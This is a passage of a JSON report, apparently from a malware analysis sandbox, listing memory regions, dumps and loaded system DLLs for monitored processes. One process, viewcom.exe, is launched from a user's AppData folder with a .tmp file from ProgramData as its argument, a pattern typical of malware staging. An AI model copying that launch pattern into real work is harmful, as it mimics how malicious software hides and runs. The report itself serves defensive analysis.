1 }, "size": 65536, "start_va": 1441792, "type": "region", "version": 1 }, "end_va": 1507327, "entry_point": 0, "filename": null, "id": "region_1552", "name": "private_0x0000000000160000", "norm_filename": null, "region_type": "private_memory", "start_va": 1441792, "timestamp": "00:01:23.456", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 32768, "start_va": 3145728, "type": "region", "version": 1 }, "end_va": 3178495, "entry_point": 0, "filename": null, "id": "region_1553", "name": "pagefile_0x0000000000300000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 3145728, "timestamp": "00:01:23.456", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 32768, "start_va": 1441792, "type": "region", "version": 1 }, "end_va": 1474559, "entry_point": 0, "filename": null, "id": "region_1554", "name": "pagefile_0x0000000000160000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 1441792, "timestamp": "00:01:23.458", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 20480, "start_va": 1980563456, "type": "region", "version": 1 }, "end_va": 1980583935, "entry_point": 1980568632, "filename": "\\Windows\\System32\\psapi.dll", "id": "region_1575", "name": "psapi.dll", "norm_filename": "c:\\windows\\system32\\psapi.dll", "region_type": "memory_mapped_file", "start_va": 1980563456, "timestamp": "00:01:23.473", "type": "region", "version": 1 } ], "terminate_reason": "terminated", "type": "monitored_process", "unmonitor_reason": "terminated_by_timeout", "version": 1 }, { "cmd_line": "\"C:\\Users\\ATVeyDl98Z\\AppData\\Local\\Microsoft\\Windows\\viewcom.exe\" \"C:\\ProgramData\\9F2D.tmp\"", "filename": "c:\\users\\atveydl98z\\appdata\\local\\microsoft\\windows\\viewcom.exe", "id": "proc_10", "image_name": "viewcom.exe", "monitor_reason": "child_process", "monitored_id": 10, "origin_monitor_id": 6, "ref_parent_process": { "ref_id": "proc_6", "ref_source": "summary", "ref_type": "monitored_process", "type": "reference", "version": 1 }, "regions": [ { "dump": { "filename": "process_00000010-region_00001403-addr_0x0000000000010000-size_0x0000000000020000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_264", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 131072, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 196607, "entry_point": 0, "filename": null, "id": "region_1403", "name": "private_0x0000000000010000", "norm_filename": null, "region_type": "private_memory", "start_va": 65536, "timestamp": "00:01:19.131", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000010-region_00001404-addr_0x0000000000030000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_265", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 196608, "type": "region", "version": 1 }, "end_va": 1245183, "entry_point": 0, "filename": null, "id": "region_1404", "name": "private_0x0000000000030000", "norm_filename": null, "region_type": "private_memory", "start_va": 196608, "timestamp": "00:01:19.131", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16384, "start_va": 1245184, "type": "region", "version": 1 }, "end_va": 1261567, "entry_point": 0, "filename": null, "id": "region_1405", "name": "pagefile_0x0000000000130000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 1245184, "timestamp": "00:01:19.131", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000010-region_00001406-addr_0x0000000000400000-size_0x0000000000019000-perm_rwx.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_266", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 102400, "start_va": 4194304, "type": "region", "version": 1 }, "end_va": 4296703, "entry_point": 0, "filename": null, "id": "region_1406", "name": "private_0x0000000000400000", "norm_filename": null, "region_type": "private_memory", "start_va": 4194304, "timestamp": "00:01:19.131", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1294336, "start_va": 2002518016, "type": "region", "version": 1 }, "end_va": 2003812351, "entry_point": 2002518016, "filename": "\\Windows\\System32\\ntdll.dll", "id": "region_1407", "name": "ntdll.dll", "norm_filename": "c:\\windows\\system32\\ntdll.dll", "region_type": "memory_mapped_file", "start_va": 2002518016, "timestamp": "00:01:19.131", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 4096, "start_va": 2004877312, "type": "region", "version": 1 }, "end_va": 2004881407, "entry_point": 2004877312, "filename": "\\Windows\\System32\\apisetschema.dll", "id": "region_1408", "name": "apisetschema.dll", "norm_filename": "c:\\windows\\system32\\apisetschema.dll", "region_type": "memory_mapped_file", "start_va": 2004877312, "timestamp": "00:01:19.132", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 143360, "start_va": 2147155968, "type": "region", "version": 1 }, "end_va": 2147299327, "entry_point": 0, "filename": null, "id": "region_1409", "name": "pagefile_0x000000007ffb0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2147155968, "timestamp": "00:01:19.137", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000010-region_00001410-addr_0x000000007ffda000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_267", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2147328000, "type": "region", "version": 1 }, "end_va": 2147332095, "entry_point": 0, "filename": null, "id": "region_1410", "name": "private_0x000000007ffda000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147328000, "timestamp": "00:01:19.137", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000010-region_00001411-addr_0x000000007ffdf000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_268", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2147348480, "type": "region", "version": 1 }, "end_va": 2147352575, "entry_point": 0, "filename": null, "id": "region_1411", "name": "private_0x000000007ffdf000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147348480, "timestamp": "00:01:19.137", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000010-region_00001424-addr_0x00000000001b0000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_273", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 1769472, "type": "region", "version": 1 }, "end_va": 2818047, "entry_point": 0, "filename": null, "id": "region_1424", "name": "private_0x00000000001b0000", "norm_filename": null, "region_type": "private_memory", "start_va": 1769472, "timestamp": "00:01:19.287", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 303104, "start_va": 1972174848, "type": "region", "version": 1 }, "end_va": 1972477951, "entry_point": 1972207072, "filename": "\\Windows\\System32\\KernelBase.dll", "id": "region_1425", "name": "kernelbase.dll", "norm_filename": "c:\\windows\\system32\\kernelbase.dll", "region_type": "memory_mapped_file", "start_va": 1972174848, "timestamp": "00:01:19.287", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 868352, "start_va": 1983184896, "type": "region", "version": 1 }, "end_va": 1984053247, "entry_point": 1983495652, "filename": "\\Windows\\System32\\kernel32.dll", "id": "region_1426", "name": "kernel32.dll", "norm_filename": "c:\\windows\\system32\\kernel32.dll", "region_type": "memory_mapped_file", "start_va": 1983184896, "timestamp": "00:01:19.288", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 131071, "entry_point": 0, "filename": null, "id": "region_1427", "name": "pagefile_0x0000000000010000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 65536, "timestamp": "00:01:19.291", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 421888, "start_va": 1310720, "type": "region", "version": 1 }, "end_va": 1732607, "entry_point": 1310720, "filename": "\\Windows\\System32\\locale.nls", "id": "region_1428", "name": "locale.nls", "norm_filename": "c:\\windows\\system32\\locale.nls", "region_type": "memory_mapped_file", "start_va": 1310720, "timestamp": "00:01:19.292", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1048576, "start_va": 2137980928, "type": "region", "version": 1 }, "end_va": 2139029503, "entry_point": 0, "filename": null, "id": "region_1429", "name": "pagefile_0x000000007f6f0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2137980928, "timestamp": "00:01:19.292", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 655360, "start_va": 1979908096, "type": "region", "version": 1 }, "end_va": 1980563455, "entry_point": 1979992549, "filename": "\\Windows\\System32\\advapi32.dll", "id": "region_1430", "name": "advapi32.dll", "norm_filename": "c:\\windows\\system32\\advapi32.dll", "region_type": "memory_mapped_file", "start_va": 1979908096, "timestamp": "00:01:19.317", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 704512, "start_va": 2000355328, "type": "region", "version": 1 }, "end_va": 2001059839, "entry_point": 2000397426, "filename": "\\Windows\\System32\\msvcrt.dll", "id": "region_1431", "name": "msvcrt.dll", "norm_filename": "c:\\windows\\system32\\msvcrt.dll", "region_type": "memory_mapped_file", "start_va": 2000355328, "timestamp": "00:01:19.318", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 102400, "start_va": 1983053824, "type": "region", "version": 1 }, "end_va": 1983156223, "entry_point": 1983072629, "filename": "\\Windows\\System32\\sechost.dll", "id": "region_1432", "name": "sechost.dll", "norm_filename": "c:\\windows\\system32\\sechost.dll", "region_type": "memory_mapped_file", "start_va": 1983053824, "timestamp": "00:01:19.322", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 659456, "start_va": 1974861824, "type": "region", "version": 1 }, "end_va": 1975521279, "entry_point": 1975067699, "filename": "\\Windows\\System32\\rpcrt4.dll", "id": "region_1433", "name": "rpcrt4.dll", "norm_filename": "c:\\windows\\system32\\rpcrt4.dll", "region_type": "memory_mapped_file", "start_va": 1974861824, "timestamp": "00:01:19.323", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000010-region_00001434-addr_0x00000000002b0000-size_0x0000000000070000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_274", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 458752, "start_va": 2818048, "type": "region", "version": 1 }, "end_va": 3276799, "entry_point": 0, "filename": null, "id": "region_1434", "name": "private_0x00000000002b0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2818048, "timestamp": "00:01:19.370", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1425408, "start_va": 2001076224, "type": "region", "version": 1 }, "end_va": 2002501631, "entry_point": 2001386045, "filename": "\\Windows\\System32\\ole32.dll", "id": "region_1435", "name": "ole32.dll", "norm_filename": "c:\\windows\\system32\\ole32.dll", "region_type": "memory_mapped_file", "start_va": 2001076224, "timestamp": "00:01:19.371", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 319488, "start_va": 2003894272, "type": "region", "version": 1 }, "end_va": 2004213759, "entry_point": 2003934217, "filename": "\\Windows\\System32\\gdi32.dll", "id": "region_1436", "name": "gdi32.dll", "norm_filename": "c:\\windows\\system32\\gdi32.dll", "region_type": "memory_mapped_file", "start_va": 2003894272, "timestamp": "00:01:19.376", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 823296, "start_va": 1975582720, "type": "region", "version": 1 }, "end_va": 1976406015, "entry_point": 1975703313, "filename": "\\Windows\\System32\\user32.dll", "id": "region_1437", "name": "user32.dll", "norm_filename": "c:\\windows\\system32\\user32.dll", "region_type": "memory_mapped_file", "start_va": 1975582720, "timestamp": "00:01:19.379", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 40960, "start_va": 1974534144, "type": "region", "version": 1 }, "end_va": 1974575103, "entry_point": 1974539116, "filename": "\\Windows\\System32\\lpk.dll", "id": "region_1438", "name": "lpk.dll", "norm_filename": "c:\\windows\\system32\\lpk.dll", "region_type": "memory_mapped_file", "start_va": 1974534144, "timestamp": "00:01:19.380", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 643072, "start_va": 1973878784, "type": "region", "version": 1 }, "end_va": 1974521855, "entry_point": 1974091735, "filename": "\\Windows\\System32\\usp10.dll", "id": "region_1439", "name": "usp10.dll", "norm_filename": "c:\\windows\\system32\\usp10.dll", "region_type": "memory_mapped_file", "start_va": 1973878784, "timestamp": "00:01:19.382", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 118784, "start_va": 2818048, "type": "region", "version": 1 }, "end_va": 2936831, "entry_point": 2822997, "filename": "\\Windows\\System32\\imm32.dll", "id": "region_1440", "name": "imm32.dll", "norm_filename": "c:\\windows\\system32\\imm32.dll", "region_type": "memory_mapped_file", "start_va": 2818048, "timestamp": "00:01:19.385", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000010-region_00001441-addr_0x0000000000310000-size_0x0000000000010000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_275", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 3211264, "type": "region", "version": 1 }, "end_va": 3276799, "entry_point": 0, "filename": null, "id": "region_1441", "name": "private_0x0000000000310000", "norm_filename": null, "region_type": "private_memory", "start_va": 3211264, "timestamp": "00:01:19.425", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 819200, "start_va": 3276800, "type": "region", "version": 1 }, "end_va": 4095999, "entry_point": 0, "filename": null, "id": "region_1442", "name": "pagefile_0x0000000000320000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 3276800, "timestamp": "00:01:19.425", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 126976, "start_va": 1997799424, "type": "region", "version": 1 }, "end_va": 1997926399, "entry_point": 1997804373, "filename": "\\Windows\\System32\\imm32.dll", "id": "region_1445", "name": "imm32.dll", "norm_filename": "c:\\windows\\system32\\imm32.dll", "region_type": "memory_mapped_file", "start_va": 1997799424, "timestamp": "00:01:19.489", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 835584, "start_va": 1999503360, "type": "region", "version": 1 }, "end_va": 2000338943, "entry_point": 1999509131, "filename": "\\Windows\\System32\\msctf.dll", "id": "region_1446", "name": "msctf.dll", "norm_filename": "c:\\windows\\system32\\msctf.dll", "region_type": "memory_mapped_file", "start_va": 1999503360, "timestamp": "00:01:19.490", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1052672, "start_va": 4325376, "type": "region", "version": 1 }, "end_va": 5378047, "entry_point": 0, "filename": null, "id": "region_1447", "name": "pagefile_0x0000000000420000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 4325376, "timestamp": "00:01:19.493", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 12582912, "start_va": 5439488, "type": "region", "version": 1 }, "end_va": 18022399, "entry_point": 0, "filename": null, "id": "region_1448", "name": "pagefile_0x0000000000530000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 5439488, "timestamp": "00:01:19.493", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000010-region_00001451-addr_0x0000000000020000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_276", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 131072, "type": "region", "version": 1 }, "end_va": 135167, "entry_point": 0, "filename": null, "id": "region_1451", "name": "private_0x0000000000020000", "norm_filename": null, "region_type": "private_memory", "start_va": 131072, "timestamp": "00:01:19.580", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000010-region_00001452-addr_0x00000000002b0000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_277", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2818048, "type": "region", "version": 1 }, "end_va": 2822143, "entry_point": 0, "filename": null, "id": "region_1452", "name": "private_0x00000000002b0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2818048, "timestamp": "00:01:19.581", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 12886016, "start_va": 1984888832, "type": "region", "version": 1 }, "end_va": 1997774847, "entry_point": 1985418753, "filename": "\\Windows\\System32\\shell32.dll", "id": "region_1453", "name": "shell32.dll", "norm_filename": "c:\\windows\\system32\\shell32.dll", "region_type": "memory_mapped_file", "start_va": 1984888832, "timestamp": "00:01:19.582", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 356352, "start_va": 1980628992, "type": "region", "version": 1 }, "end_va": 1980985343, "entry_point": 1980734374, "filename": "\\Windows\\System32\\shlwapi.dll", "id": "region_1454", "name": "shlwapi.dll", "norm_filename": "c:\\windows\\system32\\shlwapi.dll", "region_type": "memory_mapped_file", "start_va": 1980628992, "timestamp": "00:01:19.583", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 4747264, "start_va": 1597767680, "type": "region", "version": 1 }, "end_va": 1602514943, "entry_point": 1597767680, "filename": "\\Program Files\\Microsoft Office\\root\\Office16\\OLMAPI32.DLL", "id": "region_1475", "name": "olmapi32.dll", "norm_filename": "c:\\program files\\microsoft office\\root\\office16\\olmapi32.dll", "region_type": "memory_mapped_file", "start_va": 1597767680, "timestamp": "00:01:20.144", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8192, "start_va": 2883584, "type": "region", "version": 1 }, "end_va": 2891775, "entry_point": 0, "filename": null, "id": "region_1476", "name": "pagefile_0x00000000002c0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2883584, "timestamp": "00:01:20.415", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 81920, "start_va": 1833893888, "type": "region", "version": 1 }, "end_va": 1833975807, "entry_point": 1833893888, "filename": "\\Windows\\System32\\vcruntime140.dll", "id": "region_1477", "name": "vcruntime140.dll", "norm_filename": "c:\\windows\\system32\\vcruntime140.dll", "region_type": "memory_mapped_file", "start_va": 1833893888, "timestamp": "00:01:20.415", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 16384, "start_va": 1833828352, "type": "region", "version": 1 }, "end_va": 1833844735, "entry_point": 1833828352, "filename": "\\Windows\\System32\\api-ms-win-crt-runtime-l1-1-0.dll", "id": "region_1478", "name": "api-ms-win-crt-runtime-l1-1-0.dll", "norm_filename": "c:\\windows\\system32\\api-ms-win-crt-runtime-l1-1-0.dll", "region_type": "memory_mapped_file", "start_va": 1833828352, "timestamp": "00:01:20.438", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 901120, "start_va": 1865482240, "type": "region", "version": 1 }, "end_va": 1866383359, "entry_point": 1865482240, "filename": "\\Windows\\System32\\ucrtbase.dll", "id": "region_1479", "name": "ucrtbase.dll", "norm_filename": "c:\\windows\\system32\\ucrtbase.dll", "region_type": "memory_mapped_file", "start_va": 1865482240, "timestamp": "00:01:20.456", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 12288, "start_va": 1865416704, "type": "region", "version": 1 }, "end_va": 1865428991, "entry_point": 1865416704, "filename": "\\Windows\\System32\\api-ms-win-core-timezone-l1-1-0.dll", "id": "region_1480", "name": "api-ms-win-core-timezone-l1-1-0.dll", "norm_filename": "c:\\windows\\system32\\api-ms-win-core-timezone-l1-1-0.dll", "region_type": "memory_mapped_file", "start_va": 1865416704, "timestamp": "00:01:20.525", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 12288, "start_va": 1865351168, "type": "region", "version": 1 }, "end_va": 1865363455, "entry_point": 1865351168, "filename": "\\Windows\\System32\\api-ms-win-core-file-l2-1-0.dll", "id": "region_1481", "name": "api-ms-win-core-file-l2-1-0.dll", "norm_filename": "c:\\windows\\system32\\api-ms-win-core-file-l2-1-0.dll", "region_type": "memory_mapped_file", "start_va": 1865351168, "timestamp": "00:01:20.542", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 12288, "start_va": 1865285632, "type": "region", "version": 1 }, "end_va": 1865297919, "entry_point": 1865285632, "filename": "\\Windows\\System32\\api-ms-win-core-localization-l1-2-0.dll", "id": "region_1482", "name": "api-ms-win-core-localization-l1-2-0.dll", "norm_filename": "c:\\windows\\system32\\api-ms-win-core-localization-l1-2-0.dll", "region_type": "memory_mapped_file", "start_va": 1865285632, "timestamp": "00:01:20.552", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 12288, "start_va": 1868169216, "type": "region", "version": 1 }, "end_va": 1868181503, "entry_point": 1868169216, "filename": "\\Windows\\System32\\api-ms-win-core-synch-l1-2-0.dll", "id": "region_1483", "name": "api-ms-win-core-synch-l1-2-0.dll", "norm_filename": "c:\\windows\\system32\\api-ms-win-core-synch-l1-2-0.dll", "region_type": "memory_mapped_file", "start_va": 1868169216, "timestamp": "00:01:20.566", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 12288, "start_va": 1865220096, "type": "region", "version": 1 }, "end_va": 1865232383, "entry_point": 1865220096, "filename": "\\Windows\\System32\\api-ms-win-core-processthreads-l1-1-1.dll", "id": "region_1484", "name": "api-ms-win-core-processthreads-l1-1-1.dll", "norm_filename": "c:\\windows\\system32\\api-ms-win-core-processthreads-l1-1-1.dll", "region_type": "memory_mapped_file", "start_va": 1865220096, "timestamp": "00:01:20.576", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 12288, "start_va": 1865154560, "type": "region", "version": 1 }, "end_va": 1865166847, "entry_point": 1865154560, "filename": "\\Windows\\System32\\api-ms-win-core-file-l1-2-0.dll", "id": "region_1485", "name": "api-ms-win-core-file-l1-2-0.dll", "norm_filename": "c:\\windows\\system32\\api-ms-win-core-file-l1-2-0.dll", "region_type": "memory_mapped_file", "start_va": 1865154560, "timestamp": "00:01:20.797", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 16384, "start_va": 1833762816, "type": "region", "version": 1 }, "end_va": 1833779199, "entry_point": 1833762816, "filename": "\\Windows\\System32\\api-ms-win-crt-string-l1-1-0.dll", "id": "region_1486", "name": "api-ms-win-crt-string-l1-1-0.dll", "norm_filename": "c:\\windows\\system32\\api-ms-win-crt-string-l1-1-0.dll", "region_type": "memory_mapped_file", "start_va": 1833762816, "timestamp": "00:01:21.054", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 12288, "start_va": 1833697280, "type": "region", "version": 1 }, "end_va": 1833709567, "entry_point": 1833697280, "filename": "\\Windows\\System32\\api-ms-win-crt-heap-l1-1-0.dll", "id": "region_1493", "name": "api-ms-win-crt-heap-l1-1-0.dll", "norm_filename": "c:\\windows\\system32\\api-ms-win-crt-heap-l1-1-0.dll", "region_type": "memory_mapped_file", "start_va": 1833697280, "timestamp": "00:01:21.235", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 16384, "start_va": 1833631744, "type": "region", "version": 1 }, "end_va": 1833648127, "entry_point": 1833631744, "filename": "\\Windows\\System32\\api-ms-win-crt-stdio-l1-1-0.dll", "id": "region_1495", "name": "api-ms-win-crt-stdio-l1-1-0.dll", "norm_filename": "c:\\windows\\system32\\api-ms-win-crt-stdio-l1-1-0.dll", "region_type": "memory_mapped_file", "start_va": 1833631744, "timestamp": "00:01:21.275", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 16384, "start_va": 1833566208, "type": "region", "version": 1 }, "end_va": 1833582591, "entry_point": 1833566208, "filename": "\\Windows\\System32\\api-ms-win-crt-convert-l1-1-0.dll", "id": "region_1500", "name": "api-ms-win-crt-convert-l1-1-0.dll", "norm_filename": 